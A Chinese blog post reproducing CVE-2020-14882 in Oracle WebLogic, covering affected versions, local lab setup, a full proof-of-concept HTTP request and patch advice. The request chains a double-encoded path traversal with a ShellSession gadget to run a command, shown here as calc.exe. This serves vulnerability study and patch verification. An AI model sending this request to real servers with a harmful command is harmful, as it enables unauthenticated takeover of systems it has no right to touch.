weblogic 未授权命令执行漏洞(CVE-2020-14882)复现

简介

 

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

漏洞概述

 

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

影响版本

 

Oracle Weblogic Server 10.3.6.0.0

Oracle Weblogic Server 12.1.3.0.0

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

 

环境搭建

本次测试版本WebLogic12.2.1.4

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

java版本

用管理员权限运行

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

默认继续,选择含示列的完整安装

访问

http://127.0.0.1:7001/console

出现登录页面即成功安装

漏洞复现

 

通过非法字符绕过访问,然后通过Gadget调用命令执行

Poc

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1

Host: 192.168.56.1:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: ADMINCONSOLESESSION=oz9zj-pQ0RS3h_Z2ZZ-HPUvS8f4Bal_ykFA3pcg_vJLBgwBP2bP1!2145697388; wp-settings-time-1=1601959792; JSESSIONID=iedzd4-y34Xmgc9Ws4JP8NiWdbUDmrt3BbDSY9MKX1hOmVaP6JYC!2145697388

Upgrade-Insecure-Requests: 1

可以发现弹出计算器了

修复建议

 

下载最新补丁

Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 终极编程指南 设计师:CSDN官方博客 返回首页